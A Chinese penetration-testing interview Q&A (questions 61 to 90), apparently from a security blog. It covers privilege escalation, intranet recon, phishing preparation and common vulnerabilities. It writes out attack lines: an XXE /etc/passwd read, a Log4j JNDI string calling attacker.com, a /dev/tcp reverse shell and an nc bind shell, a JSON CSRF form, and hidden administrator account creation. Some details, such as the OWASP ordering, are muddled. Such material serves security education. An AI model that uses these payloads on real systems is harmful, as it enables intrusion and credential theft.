安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
[61. Windows与Linux提权思路对比](#61. Windows与Linux提权思路对比)
[62. Python框架及历史漏洞](#62. Python框架及历史漏洞)
[63. 小程序渗透 vs 普通Web渗透](#63. 小程序渗透 vs 普通Web渗透)
[64. App漏洞测试重点](#64. App漏洞测试重点)
[65. IDS/IPS绕过思路](#65. IDS/IPS绕过思路)
[66. JSON CSRF利用条件](#66. JSON CSRF利用条件)
[67. JSON数据包可测漏洞](#67. JSON数据包可测漏洞)
[68. XXE漏洞原理与利用](#68. XXE漏洞原理与利用)
[69. 内网信息收集命令](#69. 内网信息收集命令)
[70. 内网横向探测步骤](#70. 内网横向探测步骤)
[71. 外网打点标准流程](#71. 外网打点标准流程)
[72. FOFA高级搜索技巧](#72. FOFA高级搜索技巧)
[73. CDN识别方法](#73. CDN识别方法)
[74. 邮件钓鱼准备工作](#74. 邮件钓鱼准备工作)
[75. CMS识别的意义](#75. CMS识别的意义)
[76. Log4j2漏洞原理(CVE-2021-44228)](#76. Log4j2漏洞原理(CVE-2021-44228))
[77. 水坑攻击 vs 鱼叉攻击](#77. 水坑攻击 vs 鱼叉攻击)
[78. 操作系统识别方法](#78. 操作系统识别方法)
[79. 3389无法连接的原因](#79. 3389无法连接的原因)
[80. Windows隐藏用户创建](#80. Windows隐藏用户创建)
[81. MySQL无法连接排查](#81. MySQL无法连接排查)
[82. 文件上传监测点](#82. 文件上传监测点)
[83. 常见未授权访问漏洞](#83. 常见未授权访问漏洞)
[84. 高危函数清单](#84. 高危函数清单)
[85. 正向Shell vs 反向Shell](#85. 正向Shell vs 反向Shell)
[86. 正向代理 vs 反向代理](#86. 正向代理 vs 反向代理)
[87. OWASP Top 10漏洞(2023)](#87. OWASP Top 10漏洞(2023))
[88. SQL注入类型](#88. SQL注入类型)
[89. 中间件漏洞示例](#89. 中间件漏洞示例)
[90. 目录扫描工具](#90. 目录扫描工具)
61 谈一谈Windows系统与Linux系统提权的思路? 62 python有哪些框架,其中出现过哪些漏洞 63 小程序的渗透和普通渗透的差异 64 app本身的漏洞测试 65 IDS/IPS防护原理及绕过思路 66 json的csrf的利用 67 json格式的数据包可以测哪些漏洞 68 简述xxe漏洞原理与利用方式 69 内网服务器,如何进行信息收集? 70 如果拿下了内网边界层的某一个机器,如何对内网其他进行探测? 71 描述外网打点的流程? 72 举几个 FOFA 在外网打点过程中的使用小技巧? 73 如何识别CDN? 74 邮件钓鱼的准备工作有哪些? 75 判断出靶标的 CMS,对外网打点有什么意义? 76 Apache Log4j2 的漏洞原理是什么? 77 水坑攻击和鱼叉攻击的区别是什么? 78 如何判断靶标站点是 windows/linux? 79 无法连接服务器 3389 端口的几种情况? 80 如何建立隐藏用户? 81 为什么 Mysql 数据库的站点,无法连接? 82 文件上传功能的监测点有哪些? 83 常见的未授权访问漏洞有哪些? 84 代码执行、文件读取、命令执行的函数有哪些? 85 正向 shell 和反向 shell 的区别是什么? 86 正向代理和反向代理的区别? 87 Web TOP 10 漏洞有哪些? 88 SQL 注入的种类有哪些? 89 常见的中间件有哪些?他们有那些漏洞? 90 常见的目录扫描工具有哪些?
61. Windows与Linux提权思路对比
系统 核心思路 典型方法 Windows 滥用系统配置/内核缺陷 1. 服务路径劫持(可写目录+重启服务) 2. MS17-010等内核漏洞 3. 令牌窃取(JuicyPotato) Linux 权限配置错误/SUID滥用 1. SUID文件利用(find / -perm -4000) 2. Cron任务劫持 3. 内核漏洞(DirtyPipe)
62. Python框架及历史漏洞
Markdown
1. **Django** - CVE-2022-34265:SQL注入(Trunc函数) - CVE-2021-35042:目录遍历(FileSystemStorage) 2. **Flask** - SSTI漏洞(未过滤render_template_input) 3. **Tornado** - XSRF保护绕过(旧版本Cookie处理缺陷)
63. 小程序渗透 vs 普通Web渗透
维度 小程序渗透 普通Web渗透 入口点 反编译wxapkg包获取源码 直接访问URL 通信安全 微信API鉴权漏洞(如openId泄露) 传统Cookie/Session机制 存储风险 本地Storage敏感数据明文存储 服务端数据库存储 接口测试 微信云函数未授权调用 常规API接口测试
64. App漏洞测试重点
Markdown
1. **本地存储**:检查SharedPreferences/SQLite明文敏感数据 2. **网络通信**:HTTPS证书校验绕过(Burp抓包) 3. **组件暴露**:Android导出Activity攻击(adb shell启动) 4. **逻辑漏洞**:业务顺序绕过(如支付金额篡改)
65. IDS/IPS绕过思路
Mermaid
graph LR A[攻击流量] --> B{IDS检测方式} B -->|特征匹配| C[编码混淆:Unicode/HEX] B -->|行为分析| D[慢速攻击:TCP分片延时] B -->|协议校验| E[协议违规:畸形包触发解析错误]
66. JSON CSRF利用条件
漏洞前提 :
- 未校验Content-Type(后端仅处理JSON数据)
- 无Token防护
利用POC :
Html
<form action="https://target/api" method="POST" enctype="text/plain"> <input name='{"user":"attacker"}' type="hidden"> </form> <script>document.forms[0].submit()</script>
67. JSON数据包可测漏洞
Markdown
1. **注入类**:SQL注入(JSON字段未过滤)、XXE(Content-Type: application/json改为XML) 2. **逻辑漏洞**:参数篡改(如{"isAdmin":true}) 3. **反序列化**:Fastjson/Jackson漏洞(CVE-2022-25845)
68. XXE漏洞原理与利用
攻击类型 原理 利用方式 文件读取 实体注入引用本地文件 <!ENTITY xxe SYSTEM "file:///etc/passwd">SSRF 内部实体访问内网资源 <!ENTITY xxe SYSTEM "http://192.168.1.1">DoS 递归实体消耗内存 <!ENTITY a "&b;&b;&b;...">
69. 内网信息收集命令
Windows:
Batch
net view /domain # 查域信息 arp -a # ARP表 nltest /dclist:域名 # 域控制器Linux:
Bash
cat /etc/resolv.conf # DNS配置 ip route show # 路由表 smbtree -N # SMB共享发现
70. 内网横向探测步骤
Mermai
graph TB A[已控边界机] --> B[存活主机扫描(nmap -sn 192.168.1.0/24)] A --> C[端口服务探测(masscan -p1-65535)] A --> D[SMB/Redis等协议爆破] D --> E[利用NTLM中继攻击(Responder)]
71. 外网打点标准流程
- 资产发现:域名/IP/子域名(Amass)→ 端口扫描(Nmap)
- 漏洞探测:CMS识别(WhatWeb)→ 历史漏洞利用(SearchSploit)
- 突破入口:Web漏洞(如SQLi)→ 服务弱口令(SSH/RDP)
- 权限维持:植入Webshell → 建立隧道(Ngrok/frp)
72. FOFA高级搜索技巧
Markdown
1. **精准定位组件**:`app="Apache-Shiro" && country="CN"` 2. **查找历史漏洞**:`body="Struts2" && after="2023-01-01"` 3. **识别管理后台**:`title="管理系统" && header="session"` 4. **特定协议资产**:`protocol="s7"`(工控设备)
73. CDN识别方法
Markdown
- **DNS检测**:多地Ping返回不同IP(使用`www.cdnplanet.com/tools`) - **HTTP头特征**:`Server: cloudflare` / `X-Cache: HIT` - **历史记录对比**:查询域名解析历史(SecurityTrails)
74. 邮件钓鱼准备工作
Markdown
1. **目标画像**:收集邮箱后缀/部门架构(LinkedIn) 2. **克隆网站**:HTTrack复制登录页(含CSS/JS) 3. **发信平台**:使用SendGrid等合法服务绕过SPF 4. **载荷隐藏**:PDF嵌入CVE-2023-38831漏洞
75. CMS识别的意义
Markdown
1. **快速漏洞利用**:针对性搜索CMS历史漏洞(如Drupalgeddon) 2. **默认路径扫描**:`/wp-admin`(WordPress)`/administrator`(Joomla) 3. **版本比对**:Nuclei扫描特定版本漏洞
76. Log4j2漏洞原理(CVE-2021-44228)
Mermaid
graph LR A[恶意输入] --> B{日志记录} B --> C[触发JNDI解析] C --> D[加载LDAP服务] D --> E[执行远程恶意类]关键点 :
${jndi:ldap://attacker.com/exp}触发RCE
77. 水坑攻击 vs 鱼叉攻击
类型 目标 实施方式 水坑攻击 特定群体(如行业网站) 入侵目标常访问的网站 鱼叉攻击 特定个人/组织 定向发送钓鱼邮件
78. 操作系统识别方法
Markdown
- **TTL值**:Windows≈128,Linux≈64(`ping 目标`) - **HTTP头**:`Server: Microsoft-IIS` → Windows - **文件路径**:URL中出现`C:\`或`/etc/passwd`
79. 3389无法连接的原因
Markdown
1. **网络层**:防火墙阻断/路由问题(`telnet IP 3389`) 2. **系统层**:服务未启动(`services.msc`检查TermService) 3. **权限限制**:NLA(网络级认证)要求有效凭证
80. Windows隐藏用户创建
Batch
net user evil$ P@ssw0rd /add # 用户名末尾加$ net localgroup administrators evil$ /add # 注册表隐藏:HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users
81. MySQL无法连接排查
Markdown
1. **权限问题**:`GRANT ALL ON *.* TO 'user'@'%'`(允许远程访问) 2. **端口阻断**:防火墙禁止3306(`ufw allow 3306`) 3. **配置限制**:`bind-address=0.0.0.0`(监听所有IP)
82. 文件上传监测点
Markdown
1. **前端绕过**:修改JS校验(Burp改Content-Type) 2. **后缀过滤**:`.php5`/`.phtml`等冷门后缀 3. **内容校验**:图片马插入恶意代码(GIF89a头部) 4. **解析漏洞**:Apache多后缀解析(`file.php.jpg`)
83. 常见未授权访问漏洞
Markdown
复制
1. **Redis**:`redis-cli -h IP`直接执行命令 2. **Jenkins**:`/script`接口执行Groovy代码 3. **K8s API Server**:`curl https://IP:6443/api/v1/namespaces` 4. **MongoDB**:无需认证直接读写数据库
84. 高危函数清单
类型 示例函数(PHP) 示例函数(Python) 命令执行 system()/shell_exec()os.system()/subprocess.run()文件读取 file_get_contents()open()代码执行 eval()exec()
85. 正向Shell vs 反向Shell
Markdown
- **正向Shell**:攻击者直连目标监听端口 `nc -lvp 4444 -e /bin/bash`(目标执行) - **反向Shell**:目标主动连接攻击者控制端 `bash -i >& /dev/tcp/attacker_ip/4444 0>&1` **关键区别**:反向Shell可绕过防火墙出站限制
86. 正向代理 vs 反向代理
类型 功能 使用场景 正向代理 客户端匿名访问服务器 突破网络审查(VPN) 反向代理 服务器隐藏真实地址 负载均衡/隐藏后端架构
87. OWASP Top 10漏洞(2023)
Markdown
1. 访问控制失效 2. 加密机制失败 3. **注入漏洞(首位)** 4. 不安全设计 5. 安全配置错误
88. SQL注入类型
Markdown
1. **按结果**:报错注入/联合查询/盲注(Bool/Time) 2. **按技术**:堆叠注入(;多语句)/二次注入 3. **新形态**:NoSQL注入(MongoDB JSON操作符)
89. 中间件漏洞示例
中间件 高危漏洞 影响版本 Apache Tomcat PUT方法上传木马(CVE-2017-12615) < 9.0.1 Nginx 解析漏洞(CVE-2013-4547) < 1.4.3 / < 1.5.7 WebLogic 反序列化(CVE-2020-2883) 12.2.1.3以下
90. 目录扫描工具
Markdown
1. **主动扫描**:Dirsearch(多线程)/ DirBuster(GUI) 2. **被动探测**:Katana(爬虫集成JS解析) 3. **智能分析**:Feroxbuster(自动过滤误报)